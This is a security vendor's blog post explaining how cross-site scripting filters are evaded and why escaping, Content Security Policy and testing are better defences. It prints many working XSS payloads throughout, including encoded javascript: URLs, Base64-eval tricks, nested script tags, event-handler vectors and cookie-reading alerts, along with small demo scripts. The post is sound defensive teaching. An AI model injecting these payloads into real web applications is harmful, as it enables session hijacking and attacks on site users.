XSS filter evasion: Why filtering doesn’t stop cross-site scripting

XSS filter evasion techniques allow attackers to get past cross-site scripting filters. This post lists some of the most common filter bypass methods, shows why filtering alone cannot be trusted to stop XSS attacks, and discusses recommended ways to prevent cross-site scripting.

XSS filter evasion covers many hundreds of methods that attackers can use to bypass cross-site scripting (XSS) filters. A successful attack requires both an XSS vulnerability and a way to inject malicious JavaScript into web page code executed by the client to exploit that vulnerability. The idea of XSS filtering is to prevent attacks by finding and blocking (or stripping away) any code that looks like an XSS attempt. The problem is that there are countless ways of bypassing such filters, so filtering alone can never fully prevent XSS. Before going into just a few of the many known filter evasion methods, let’s start with a quick look at the concept and history of XSS filtering.

What is XSS filtering and why is it so hard to do?

At the application level, XSS filtering means user input validation performed specifically to detect and prevent script injection attempts. Filtering can be done locally in the browser, during server-side processing, or by a web application firewall (WAF). For many years, server-side filtering was mostly used, but eventually browser vendors started building in their own filters called XSS auditors to prevent at least some cross-site scripting attempts from reaching the user.

The idea was that the filter scans code arriving at the browser and looks for typical signs of XSS payloads, such as suspicious <script> tags in unexpected places. Common approaches to filtering included complex regular expressions (regex) and code string blacklists. If potentially dangerous code was found, the auditor could block either the entire page or just the suspicious code fragment. Both reactions had their disadvantages and could even open up new vulnerabilities and attack vectors, which is why integrated browser filters soon went away.
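To make the blacklist approach more concrete, here is a minimal Python sketch of a string-matching filter. The pattern list and the function name looks_malicious are assumptions made up for illustration and are not taken from any real auditor or WAF.

```python
import re

# Hypothetical blacklist: patterns a simple filter might treat as suspicious.
BLACKLIST = [
    re.compile(r"<script\b", re.IGNORECASE),
    re.compile(r"javascript:", re.IGNORECASE),
]

def looks_malicious(value: str) -> bool:
    """Return True if any blacklisted pattern occurs in the raw input."""
    return any(pattern.search(value) for pattern in BLACKLIST)

# The textbook payload matches the first pattern.
print(looks_malicious("<script>alert(1)</script>"))

# An event-handler payload contains neither pattern, so it passes the check.
print(looks_malicious("<svg/onload=alert('XSS')>"))
```

Every pattern added to such a list only covers the payloads someone has already thought of, which is the weakness the rest of this post explores.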

All approaches to filtering have their limitations. XSS filtering by the browser is only effective against reflected XSS attacks, where the malicious code injected by the attacker is directly reflected in the client browser. Client-side filters and auditors are no use when the attack code does not arrive in the request and response that the filter inspects, which is the case for DOM-based XSS and stored XSS. Server-side and WAF-based filters can help against reflected and stored XSS but are helpless against DOM-based attacks since these happen entirely in the browser and the exploit code never arrives at the server. On top of that, trying to do XSS filtering in the web application itself is extremely complicated, can have unintended consequences, and requires constant maintenance to keep up with new exploits.

How attackers bypass cross-site scripting filters

At best, XSS filtering adds an extra level of difficulty to the work of attackers crafting XSS attacks, as any injected script code first has to get past the filters. While XSS attacks generally target application vulnerabilities and misconfigurations, XSS evasion techniques exploit gaps in the filtering performed by the browser, server, or WAF. 

There are numerous evasion approaches that can be combined to build countless bypasses. The common denominator is that they abuse product-specific implementations of web technology specifications. A large part of any browser’s codebase is devoted to gracefully handling malformed HTML, CSS, and JavaScript to try and fix code before presenting it to the user. XSS filter evasion techniques take advantage of this complex tangle of languages, specifications, exceptions, and browser-specific quirks to slip malicious code past the filters.

Examples of XSS filter bypasses

Filter evasion attempts can target any aspect of web code parsing and processing, so there are no rigid categories here and the list is always open. The most obvious script tag injections will generally be rejected out of hand, but there are many more sophisticated methods, and you can also use other HTML tags as injection vectors. Event handlers, in particular, are often used to trigger script loading, as they can be tied into legitimate user actions and are hard to just remove without breaking functionality. Commonly exploited handlers include onerror, onclick, and onfocus, but the majority of supported event handlers can be used as XSS vectors.

To give you some idea of the huge number of ways to bypass an XSS filter, the long list below is still only a tiny fraction of the tools available to attackers (see the OWASP Cheat Sheet for a scarily detailed list based on RSnake’s original cheat sheet). While this post is definitely not a complete reference, and most examples will only work in specific scenarios, anyone familiar with JavaScript should be aware that many such quirks exist alongside what you’d normally consider valid syntax.

Character encoding tricks

To bypass filters that rely on scanning text for specific suspicious strings, attackers have a variety of ways to encode one or many characters. Encodings can also be nested, so you’re encoding the same string many times, potentially using different methods. The choice of encoding is also dependent on the context, as browsers encode and decode characters differently in different places (for example, URL encoding is only supported for URL values in attributes such as href). The following examples show just a few possibilities, and that’s without even resorting to Unicode tricks.

To bypass filters that directly search for a string like javascript:, some or all characters can be written as HTML entities using ASCII codes:

<a href="&#106;avascript:alert('Successful XSS')">Click this link!</a>

To evade filters that look for HTML entity codes using a pattern of &# followed by a number, you can use ASCII codes but in hexadecimal encoding:

<a href="&#x6A;avascript:alert(document.cookie)">Click this link!</a>
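The following Python sketch shows why both of these encodings get past string-matching filters. The two filter functions are hypothetical stand-ins for the kinds of checks described above, and html.unescape from the standard library is used only as an approximation of how a browser decodes entities in an attribute value.

```python
import html
import re

def keyword_filter(value: str) -> bool:
    """Hypothetical filter: flag input containing the literal 'javascript:'."""
    return "javascript:" in value.lower()

def decimal_entity_filter(value: str) -> bool:
    """Hypothetical filter: also flag decimal entities such as &#106;."""
    return keyword_filter(value) or re.search(r"&#\d+", value) is not None

decimal_href = "&#106;avascript:alert('Successful XSS')"
hex_href = "&#x6A;avascript:alert(document.cookie)"

for href in (decimal_href, hex_href):
    # Show what each filter decides and what the value decodes to.
    print(keyword_filter(href), decimal_entity_filter(href), html.unescape(href))
```

The decimal version slips past the keyword check, and the hexadecimal version slips past both checks, yet each one decodes to a working javascript: URL.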

Base64 encoding can be used to obfuscate attack code. This example also displays an alert saying “Successful XSS”:

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
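If you want to check what a Base64 payload like this one actually contains, you can decode it outside the browser. This is a small Python sketch using only the standard library; the variable names are arbitrary.

```python
import base64

# The attribute value from the example above, as a filter would see it.
attribute_value = "eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))"

# The Base64 string on its own, decoded the way atob() would decode it.
encoded = "YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk="
decoded = base64.b64decode(encoded).decode("ascii")

print("alert" in attribute_value)  # False: the keyword never appears in the raw input
print(decoded)                     # alert('Successful XSS')
```

A filter that searches the raw attribute for alert finds nothing, because the call only exists after the browser decodes and evaluates the string.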

Numeric character entities can contain anywhere from 1 to 7 digits, with any leading padding zeroes being ignored. This gives each entity in each encoding several extra zero-padded versions (OWASP’s XSS filter evasion cheat sheet lists no fewer than 70 valid ways of encoding just the < character). Also, note that semicolons are not actually required at the end of entities:

<a href="&#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>
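To get a feel for how quickly these variants multiply, the Python sketch below generates zero-padded decimal and hexadecimal references for a single character, with and without the trailing semicolon. The helper numeric_variants is a hypothetical name, it covers only a subset of the forms on the OWASP list, and html.unescape again stands in for browser decoding.

```python
import html

def numeric_variants(char: str, max_digits: int = 7):
    """Yield zero-padded decimal and hex references for one character."""
    code = ord(char)
    for width in range(1, max_digits + 1):
        bodies = (
            f"#{code:0{width}d}",   # decimal, e.g. #060
            f"#x{code:0{width}x}",  # lowercase hex, e.g. #x03c
            f"#X{code:0{width}X}",  # uppercase hex, e.g. #X03C
        )
        for body in bodies:
            for terminator in ("", ";"):  # the semicolon is optional
                yield f"&{body}{terminator}"

# A set removes duplicates (widths 1 and 2 produce the same text for '<').
variants = set(numeric_variants("<"))
print(len(variants), all(html.unescape(v) == "<" for v in variants))

# The mixed example from the text decodes to a plain javascript: URL.
href = "&#x6A;avascript&#0000058&#0000097lert('Successful XSS')"
print(html.unescape(href))
```

A filter would need to recognize every one of these spellings for every character it cares about, which is why decoding before checking is the only workable order of operations.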

Character codes can be used to hide XSS payloads:

<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>

Whitespace embedding

Browsers are very permissive when it comes to whitespace in HTML and JavaScript code, so embedded non-printing characters are another way to mess with filters. Note that most browsers no longer fall for such whitespace tricks, though they can still work in some contexts.

Tab characters are ignored when parsing code, so they can be used to break up keywords, as in this img tag (this one won’t work in a modern browser):

<img src="java	script:al	ert('Successful XSS')">

The tabs can also be encoded:

<img src="java&#x09;script:al&#x09;ert('Successful XSS')">

Just like tabs, newlines and carriage returns are also ignored and can be additionally encoded:

<a href="jav&#x0A;ascript:&#x0A;ale&#x0D;rt('Successful XSS')">Visit google.com</a>

Some filters may look for "javascript: or 'javascript: and will not expect whitespace after the quote. In reality, any number of spaces and meta characters from 1 through 32 (decimal) will be valid:

<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>
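The whitespace tricks in this section all rely on the URL being cleaned up before it is interpreted. The Python sketch below roughly mimics that cleanup, assuming the pre-processing described in the WHATWG URL Standard (trim leading and trailing control characters and spaces, then drop tabs and newlines anywhere). The function normalize_url is a hypothetical helper, not a browser API, and the inputs are shown after entity decoding.

```python
# Characters removed from anywhere inside a URL string.
TAB_AND_NEWLINES = "\t\n\r"

# Control characters (code points 0 through 31) plus the space character.
C0_CONTROL_OR_SPACE = "".join(chr(code) for code in range(0x00, 0x21))

def normalize_url(raw: str) -> str:
    """Approximate URL pre-processing: trim the ends, then drop tabs/newlines."""
    trimmed = raw.strip(C0_CONTROL_OR_SPACE)
    return "".join(ch for ch in trimmed if ch not in TAB_AND_NEWLINES)

samples = [
    "java\tscript:al\tert('Successful XSS')",
    "jav\nascript:\nale\rrt('Successful XSS')",
    "  \x08 \x17   javascript:alert('Successful XSS')",
]

for raw in samples:
    # A naive prefix check fails on the raw value but not on the normalized one.
    print(raw.startswith("javascript:"), normalize_url(raw).startswith("javascript:"))
```

None of the raw values start with javascript:, but all of them do once normalized, so a filter that inspects the raw string and a parser that normalizes it will disagree.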

Tag manipulation

If the filter simply scans the code once and removes specific tags, such as <script>, nesting them inside other tags will leave valid code after they are removed:

<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
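Here is a short Python sketch of why a single removal pass fails on this payload. The regular expression and both function names are assumptions chosen for illustration, not a real filter implementation.

```python
import re

# Hypothetical filter rule: remove opening and closing script tags.
SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)

def strip_once(value: str) -> str:
    """Remove script tags in a single pass, as a simple filter might."""
    return SCRIPT_TAG.sub("", value)

def strip_until_stable(value: str) -> str:
    """Repeat the removal until the output stops changing."""
    previous = None
    while previous != value:
        previous, value = value, strip_once(value)
    return value

payload = '<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>'

print(strip_once(payload))          # the removal reassembles working script tags
print(strip_until_stable(payload))  # repeated passes remove the reassembled tags
```

Repeating the pass closes this particular gap, but it is still a blacklist and does nothing about payloads that never use a script tag in the first place.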

Spaces between attributes can often be omitted. Also, a slash is a valid separator between the tag name and attribute name, which can be useful to evade whitespace limitations in inputs – note no whitespace in the entire string:

<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>

And another example without any whitespace, this time using the svg tag:

<svg/onload=alert('XSS')>

If parentheses or single quotes are disallowed, that’s not a problem—replacing them with backticks is still valid JavaScript:

<svg/onload=alert`xss`>

Evasion attempts can also exploit browser efforts to interpret and complete malformed tags. Here’s an example that omits the href attribute and quotes (most other event handlers can also be used): 

<a onmouseover=alert(document.cookie)>Go to google.com</a>

And an extreme example of a completely wrecked img tag that loads a script once repaired by the browser: 

<img """><script src=xssattempt.js></script>">

Extra fun with Internet Explorer

Before there was Chrome or Firefox (and definitely before Edge), there was almost exclusively Internet Explorer. Because of its many non-standard implementations and quirks related to other Microsoft technologies, IE provided some unique filter evasion vectors. And before you dismiss it as an outdated and marginal browser, remember that some legacy enterprise applications may continue to rely on IE-specific features.

The majority of XSS checks look for JavaScript, but Internet Explorer up to IE10 would also accept VBScript:

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

Another unique IE feature is dynamic properties, which allow script expressions as CSS values:

body { color: expression(alert('Successful XSS')); }

The rare and deprecated dynsrc attribute can provide another vector: 

<img dynsrc="javascript:alert('Successful XSS')">

Use backticks when you need both double and single quotes: 

<img src=`javascript:alert("The name is 'XSS'")`>

In older IE versions, you could also include a script disguised as an external style sheet: 

<link rel="stylesheet" href="http://example.com/xss.css">

Cabinet of curiosities: Legacy methods

Web technology specifications and implementations change so often that XSS filter bypasses naturally have a short shelf life. To end this article, here are some curiosities that shouldn’t work today but provide a glimpse into the many edge cases that can creep up when implementing new specs while also maintaining backward compatibility.

Injection into the background image attribute:

<body background="javascript:alert('Successful XSS')">

Same idea but using a style:

<div style="background-image:url(javascript:alert('Successful XSS'))">

Images without any img tags and with script code instead of the image file:

<input type="image" src="javascript:alert('Successful XSS')">

Script injected as the target URL for a meta tag redirect. In some older browsers, this would display an alert by evaluating the Base64-encoded JavaScript code:

<meta http-equiv="refresh" content="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

And as a final curiosity—did you know that, once upon a time, it was possible to hide an XSS payload using UTF-7 encoding?

<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>
+ADw-script+AD4-alert('xss');+ADw-/script+AD4-
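You can see what a UTF-7 payload hides by decoding it with Python’s built-in utf-7 codec. This sketch assumes the standard uppercase +ADw- and +AD4- sequences, since the Base64 alphabet used by UTF-7 is case-sensitive.

```python
# The payload as raw bytes: no angle brackets for a filter to find.
payload = b"+ADw-script+AD4-alert('xss');+ADw-/script+AD4-"

print(b"<" in payload, b">" in payload)

# Decoding as UTF-7 turns +ADw- into '<' and +AD4- into '>'.
decoded = payload.decode("utf-7")
print(decoded)
```

A filter looking for angle brackets in the raw bytes sees nothing suspicious, while a browser that honored the utf-7 charset would have seen a complete script element.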

How can you protect your applications from cross-site scripting if not by filtering?

While web application firewalls can provide some XSS filtering, it’s worth keeping in mind that this is, at best, only one of many layers of protection. With hundreds of ways of evading filters and new vectors appearing all the time, filtering alone cannot prevent XSS. Combined with the potential for breaking valid scripts in complex modern applications, this is part of the reason why browser vendors are moving away from filtering.

By writing secure code that is not susceptible to XSS attacks, developers can have far more effect on application and user security than any filters. On the application level, this means treating all user-controlled inputs as untrusted by default and correctly applying context-sensitive escaping and encoding. On the HTTP protocol level, the main weapons against cross-site scripting are properly configured Content Security Policy (CSP) headers and other HTTP security headers.
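As a rough illustration of context-sensitive output handling, the Python sketch below escapes text for an HTML context and only accepts link targets with an allowlisted scheme. The names ALLOWED_SCHEMES, safe_href, and render_link, as well as the example policy string, are assumptions made up for this sketch. In a real application you would normally rely on your framework’s templating engine and a policy tailored to your site.

```python
import html
from urllib.parse import urlsplit

# Assumption: only absolute http(s) links are acceptable in this application.
ALLOWED_SCHEMES = {"http", "https"}

# Example policy only; real policies depend on what the site needs to load.
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'",
)

def safe_href(url: str, fallback: str = "#") -> str:
    """Return the URL if its scheme is allowlisted, otherwise a harmless fallback."""
    candidate = url.strip()
    try:
        scheme = urlsplit(candidate).scheme.lower()
    except ValueError:
        return fallback
    return candidate if scheme in ALLOWED_SCHEMES else fallback

def render_link(url: str, label: str) -> str:
    """Build an anchor tag, escaping both the attribute value and the text."""
    href = html.escape(safe_href(url), quote=True)
    return f'<a href="{href}">{html.escape(label)}</a>'

print(render_link("javascript:alert(1)", "<b>Click</b>"))
print(render_link("https://example.com/?a=1&b=2", "Example"))
```

The design choice here is to allow known-good values instead of hunting for known-bad ones, so an unfamiliar encoding trick fails closed instead of slipping through.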

With these best practices in place, you then also need to regularly test every site, app, and API to make sure that new code, updates, and configuration changes don’t result in exploitable XSS vulnerabilities. Running an enterprise-grade web vulnerability scanner that checks for vulnerabilities and security misconfigurations as part of a continuous process is thus an essential part of application security hygiene.

Zbigniew Banach

About the Author

Zbigniew Banach - Technical Content Lead & Managing Editor

Cybersecurity writer and blog managing editor at Invicti Security. Drawing on years of experience with security, software development, content creation, journalism, and technical translation, he does his best to bring web application security and cybersecurity in general to a wider audience.